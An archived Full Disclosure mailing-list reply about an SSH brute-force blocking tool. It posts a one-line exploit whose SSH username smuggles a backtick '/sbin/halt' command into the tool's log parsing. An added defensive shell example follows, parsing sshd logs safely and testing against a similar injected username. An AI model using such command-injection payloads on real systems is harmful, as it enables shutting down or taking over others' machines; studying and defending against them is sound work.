Full Disclosure mailing list archives
Re: SSH brute force blocking tool
From: Tavis Ormandy <taviso () gentoo org>
Date: Mon, 27 Nov 2006 20:34:33 +0000
On Mon, Nov 27, 2006 at 02:22:10PM -0500, J. Oquendo wrote:
> For those interested, I wrote a program called Sharpener which is an SSH
> brute force blocking tool that also reports back the offenders' addresses.
> I have begun posting the information on the attackers as well as sending
> out messages (whenever possible) to the admins of these domains. Think of
> it as an RBL for SSH attackers. The goal is to identify these machines in
> order for others to implement safeguards (ACLs) against these hosts. Feel
> free to comment/complain.
>
> http://www.infiltrated.net/sharpener (tool)
> http://www.infiltrated.net/bruteforcers (offenders)

Nice work, really subtle rootkit. I like the email phone-home.

Here's an exploit.

#!/bin/sh
ssh 'foo bar `/sbin/halt`'@victim

--
-------------------------------------
taviso () sdf lonestar org | finger me for my pgp key.
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
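
The username in the message above reaches a log-driven blocking tool through sshd's log, so the parser has to treat it strictly as data. The following is an added example, not part of the original post and not Sharpener's code; it assumes OpenSSH's "Failed password ... from ADDR port N ssh2" log format, and the function names and sample lines are constructed.

```shell
#!/bin/sh
# Added example. Constructed sshd log lines; the second username carries a
# backtick command (a harmless stand-in for the one in the message).
sample_log() {
cat <<'EOF'
Nov 27 20:30:01 host sshd[4242]: Failed password for invalid user admin from 192.0.2.10 port 51234 ssh2
Nov 27 20:30:05 host sshd[4243]: Failed password for invalid user foo bar `touch sharpener_canary` from 192.0.2.77 port 51240 ssh2
Nov 27 20:30:09 host sshd[4244]: Failed password for root from 192.0.2.10 port 51236 ssh2
Nov 27 20:31:00 host sshd[4250]: Accepted password for alice from 198.51.100.5 port 40022 ssh2
EOF
}

# Succeeds only for a dotted quad with four octets in 0..255.
is_ipv4() {
    case $1 in
        ''|*[!0-9.]*|*..*|.*|*.) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $1            # safe to split: only digits and dots remain
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

# Reads log lines on stdin, prints each offending address once.
extract_offenders() {
    # The pattern is anchored at the end of the line because the username is
    # attacker-chosen text; only the captured address leaves sed, and no log
    # content is ever passed to eval, backticks or an unquoted expansion.
    sed -n 's/^.*sshd\[[0-9]*]: Failed password for .* from \([0-9][0-9.]*\) port [0-9][0-9]* ssh2$/\1/p' |
    while IFS= read -r addr; do
        if is_ipv4 "$addr"; then printf '%s\n' "$addr"; fi
    done | sort -u
}

# Prints (does not run) one firewall rule per validated address.
block_rules() {
    extract_offenders | while IFS= read -r addr; do
        printf 'iptables -A INPUT -s %s -j DROP\n' "$addr"
    done
}

sample_log | block_rules
```
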
Current thread:
- SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool J. Oquendo (Nov 27)
- Re: SSH brute force blocking tool Tavis Ormandy (Nov 27)
- Re: SSH brute force blocking tool gabriel rosenkoetter (Nov 27)